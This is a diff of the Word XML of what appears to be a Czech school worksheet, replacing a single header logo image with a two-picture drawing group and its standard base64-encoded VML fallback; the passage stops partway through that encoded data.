--- a/~~Dlouhodobka~~/DOCX/Pracovni_list_smekama.docx
+++ b/~~Dlouhodobka~~/DOCX/Pracovni_list_smekama.docx
@@ -9,56 +9,111 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="675A6549" wp14:editId="33E3F64A">
-            <wp:extent cx="718057" cy="718057"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
-            <wp:docPr id="1522910054" name="Obrázek 3" descr="SPŠEaG V Úžlabině"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1" descr="SPŠEaG V Úžlabině"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId8" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="728733" cy="728733"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wpg">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EF3BC1D" wp14:editId="2F791EF3">
+                <wp:extent cx="1370965" cy="780948"/>
+                <wp:effectExtent l="0" t="0" r="635" b="635"/>
+                <wp:docPr id="5606" name="Group 5606"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
+                    <wpg:wgp>
+                      <wpg:cNvGrpSpPr/>
+                      <wpg:grpSpPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1370965" cy="780948"/>
+                          <a:chOff x="0" y="0"/>
+                          <a:chExt cx="1370965" cy="780948"/>
+                        </a:xfrm>
+                      </wpg:grpSpPr>
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="44" name="Picture 44"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId8"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="650875" y="2566"/>
+                            <a:ext cx="720090" cy="720090"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="46" name="Picture 46"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId9"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="651510" cy="780948"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </wpg:wgp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:group w14:anchorId="1B65AEB1" id="Group 5606" o:spid="_x0000_s1026" style="width:107.95pt;height:61.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="13709,7809" o:gfxdata="UEsDBBQABgAIAAAAIQDa9j37DQEAABQCAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbJSRwU7DMAyG&#10;70i8Q5QralN2QAi13YGOIyA0HiBK3DajcaI4lO3tSbtNgolN4pjY3+/PSbnc2oGNEMg4rPhtXnAG&#10;qJw22FX8ff2U3XNGUaKWg0Oo+A6IL+vrq3K980As0UgV72P0D0KQ6sFKyp0HTJXWBStjOoZOeKk+&#10;ZAdiURR3QjmMgDGLUwavywZa+TlEttqm673JxnecPe77plEVN3biNx46Lv5EAgx0wkjvB6NkTMuJ&#10;EfWJWHaQyhM591BvPN0k8zMTpspvqZ8DDtxLes1gNLBXGeKztEld6EACFq5xKr+cMUlaylzbGgV5&#10;E2g1U0enc9nafWGA8b/hTcLeYDymi/lP628AAAD//wMAUEsDBBQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAX3JlbHMvLnJlbHOkkMFqwzAMhu+DvYPRfXGawxijTi+j0GvpHsDYimMaW0Yy2fr2M4PB&#10;MnrbUb/Q94l/f/hMi1qRJVI2sOt6UJgd+ZiDgffL8ekFlFSbvV0oo4EbChzGx4f9GRdb25HMsYhq&#10;lCwG5lrLq9biZkxWOiqY22YiTra2kYMu1l1tQD30/bPm3wwYN0x18gb45AdQl1tp5j/sFB2T0FQ7&#10;R0nTNEV3j6o9feQzro1iOWA14Fm+Q8a1a8+Bvu/d/dMb2JY5uiPbhG/ktn4cqGU/er3pcvwCAAD/&#10;/wMAUEsDBBQABgAIAAAAIQDoQNRXUwIAAOIGAAAOAAAAZHJzL2Uyb0RvYy54bWzUVduO0zAQfUfi&#10;Hyy/b5OUNm2jpvtStkJCUC3wAa7jJBbxRbbbdP+esXNht10BqniAhzgzdjxz5vh4sr4/iwadmLFc&#10;yRwnkxgjJqkquKxy/O3rw90SI+uILEijJMvxE7P4fvP2zbrVGZuqWjUFMwiCSJu1Ose1czqLIktr&#10;JoidKM0kLJbKCOLANVVUGNJCdNFE0zhOo1aZQhtFmbUwu+0W8SbEL0tG3eeytMyhJseAzYXRhPHg&#10;x2izJllliK457WGQG1AIwiUkHUNtiSPoaPhVKMGpUVaVbkKViFRZcspCDVBNEl9UszPqqEMtVdZW&#10;eqQJqL3g6eaw9NNpZ/QXvTfARKsr4CJ4vpZzaYR/A0p0DpQ9jZSxs0MUJpN3i3iVzjGisLZYxqvZ&#10;suOU1kD81TZav//1xmhIG70AoznN4OkZAOuKgd8rBXa5o2G4DyL+KIYg5vtR38FhaeL4gTfcPQXh&#10;wbF4UPK053RvOgfI3BvEixzPZhhJIkDwsOyzIpgBhv0W/5XfA27k/RchDg3XD7xpPO/e7sGCYi9O&#10;/JV6OzVtFT0KJl13PQxrALeStubaYmQyJg4MAJoPRdIdlHWGOVr7hCUkfoQr45GRbFwIKH8C85gt&#10;COYViaTzeLkAMYAWpvM07RIMUlnAfV3BHQxK6ewu0aAzbazbMSWQNwAiIAGWSUZOH22Pafikp66D&#10;EfABqo5eMP4fmaRXMgmkeYr/FZlM/75MQATXnSSdJ/NkkMfYSMZ+QLLh7G+XR+gp0EiDvPum7zv1&#10;cx/s57+mzQ8AAAD//wMAUEsDBAoAAAAAAAAAIQB37z8oSiMAAEojAAAUAAAAZHJzL21lZGlhL2lt&#10;YWdlMS5qcGf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQFCAUFBAQFCgcH&#10;BggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQFCQUFCRQN&#10;Cw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFP/AABEI&#10;AK0ArQMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv/xAC1EAACAQMD&#10;AgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUm&#10;JygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaX&#10;mJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4&#10;+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncA&#10;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&#10;VFaPfH9mtv3pSQf3ZGVIj/11FAH0p+0